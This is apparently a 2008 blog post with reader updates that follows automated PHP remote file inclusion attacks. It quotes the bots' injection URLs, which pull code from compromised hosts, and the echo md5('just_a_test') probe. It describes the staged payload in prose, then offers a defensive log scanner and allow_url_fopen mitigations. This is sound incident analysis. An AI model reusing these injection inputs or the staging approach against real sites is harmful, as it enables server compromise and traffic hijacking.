which all seem to revolve around finding poorly written PHP code.
The robots are replacing script.php?id=4 entries with urls like:
script.php?id=http://concorduae.com/oldtaifgate/articles/qozevuc/gofadur/
and
script.php?id=http://mslayouts.ws/icons/administrator/components/com_menus/aruyi/iyuxuyi/
All these landing pages have the following on them:
<?php echo md5("just_a_test");?>
If you have a browse around these obviously hacked sites there is some other interesting code, eg: http://concorduae.com/oldtaifgate/articles/qozevuc/
I'm changing a script which gets hit a few times a day to actually see what the bot will do when it finds the output from the echo md5() statement.
...
Here's what happens when the initial just_a_test exploit attempt is successful:
My fake exploitable script was hit 7 times by the robots. Each hit was from a different IP address and used a different compromised host for the initial just_a_test remote file code. Each robot was presented with the output from echo md5("just_a_test");
The robots didn't seem to do anything straight after seeing that the site was exploitable, but 8 hours later I received 60 hits from robots trying to inject a different bit of code:
http://www.municipioxii.it/sunnyway/eheqebi/tigogo/a/ and http://www.cjp.spb.ru/en/tis/geze/a/ and so on... (all ending in /a/)
The time lapse between initial attempts and follow up attempts leads me to believe that the initial robots communicate back to a central server when they find an exploitable host. More robots are then scheduled to come back to the exploitable host and try to move to the next level.
This code file they were trying to inject contains a lot of white space with some PHP code in the middle. Here's the formatted PHP code if you want to have a look:
The step 2 PHP code creates a new file with the contents from base64_decode. The file is called namogofer.php and it tries to create this file in every directory under the document root. When step 2 successfully creates a file on the server it will output a tab separated list of information about where the file is located, and continue. The contents of the namogofer.php file which get written to the web server are here:
As you can see Step 3 code is waiting for a special file upload. The next round of attacks will involve uploading another php file to the server in the form of a normal file upload. The code will be dumped in the /tmp directory like all file uploads are, and then the code will be eval()'d
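As an added example (not code from the original post), here is a small Python scanner that pulls the remote file inclusion pattern described above out of Apache combined-format access logs: any query parameter whose value is an absolute URL is flagged, and the injected URL is labelled as a first-stage probe or as one of the follow-up injections that end in /a/. The log lines, hosts and paths below are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined-log format: client IP, timestamp, request line, status, bytes, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def rfi_params(target):
    """Return (name, value) pairs for query parameters whose value is an absolute URL,
    i.e. the script.php?id=http://... shape the bots use for remote file inclusion."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if value.strip().lower().startswith(("http://", "https://", "ftp://"))]

def classify(injected_url):
    """First-stage probes point at a random directory on a compromised host; the
    follow-up injections seen hours later all end in /a/."""
    return "stage2-follow-up" if urlsplit(injected_url).path.endswith("/a/") else "stage1-probe"

def scan(log_lines):
    """Scan raw access-log lines and return one finding per injected URL."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for name, url in rfi_params(m.group("target")):
            findings.append({
                "ip": m.group("ip"),
                "script": urlsplit(m.group("target")).path,
                "param": name,
                "url": url,
                "stage": classify(url),
            })
    return findings

# Constructed sample log lines (hosts and paths are made up for this example).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Feb/2008:02:11:09 +1000] "GET /script.php?id=4 HTTP/1.1" 200 1532 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [05/Feb/2008:02:11:10 +1000] "GET /script.php?id=http://compromised-a.example/img/qozevuc/gofadur/ HTTP/1.1" 200 32 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [05/Feb/2008:10:14:51 +1000] "GET /script.php?id=http://compromised-b.example/en/geze/a/ HTTP/1.1" 200 32 "-" "libwww-perl/5.805"',
    'this line is not a combined-format log entry',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']}\t{f['script']}\t{f['param']}\t{f['stage']}\t{f['url']}")
```

Pipe a real access log in via scan(open(path)) to list which scripts and parameters the bots are hitting and whether the /a/ follow-up stage has started.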
I'll update again once I catch the uploaded code.
UPDATE:
I'm seeing about 100 hits a day and growing on this topic. If anybody knows the true nature of this exploit attempt or how so many websites have been compromised tell me about it and I'll post it here. dtbaker @ gmail. com
UPDATE:
More compromised hosts (2008-02-06):
UPDATE:
From Jonathan Dill
Digging through web logs, there has been a surge in this type of activity lately, but it appears to be run-of-the-mill index.php attempted remote file inclusion exploit, as long as you have PHP configured with allow_url_fopen = 'off' you should be OK. Newer PHP uses a "wrapper" which allows you to restrict what can be included, or you can recode to use cURL instead of url_fopen.
Here are some relevant articles:
http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml
Docs from PHP website:
http://us2.php.net/filesystem
See also:
http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html
Recommendations
You should disable allow_url_fopen in the php.ini file:
; Disable allow_url_fopen for security reasons
allow_url_fopen = Off
The setting can also be disabled in Apache's httpd.conf file:
# Disable allow_url_fopen for security reasons
php_flag allow_url_fopen off
For remote file access, consider using the cURL functions that PHP provides.
UPDATE:
I have made a number of scripts output echo md5("just_a_test"); when they see these automated exploit attempts.
Hopefully I will catch one soon and will be able to see what the next step in the remote file inclusion exploit is.
Mark: some info about WordPress and this exploit: http://news.go41.de/events/php-echo-md5-just_a_test-what-is-that/
Mark: a .htaccess snippet that stops URLs from being passed into any scripts: http://news.go41.de/events/md5-just_a_test-htaccess-solution/ (not sure if this will affect any legit stuff - do any popular WordPress etc. scripts require URLs to be passed as parameters, like referral link counters etc.?)
I have received quite a few emails from people who have had their servers compromised by this attack.
It seems the overall goal of this attack is to infect .htaccess and JavaScript files with as little impact on normal website functionality as possible. When visitors navigate to the infected site via search engines the user's browsing experience is altered so the attacker can build revenue from PPC vendors.
[snip]
Our server seems to have been exploited by this code. The payload seemed to be a redirection script that takes any search referrals from Google, Yahoo, etc and then creates a pseudo blog page promoting some paid advertising where the blog owner gets a commission on the clicks.
The PPC vendor is (in this instance) PeakClick www.peakclick.com. They don't appear to be involved in this.
[/snip]
For those who are digging around: you can find and report straight to the PPC vendors and request that they disable the accounts of the user who is exploiting this attack.
Will post some infected JavaScript snippets soon...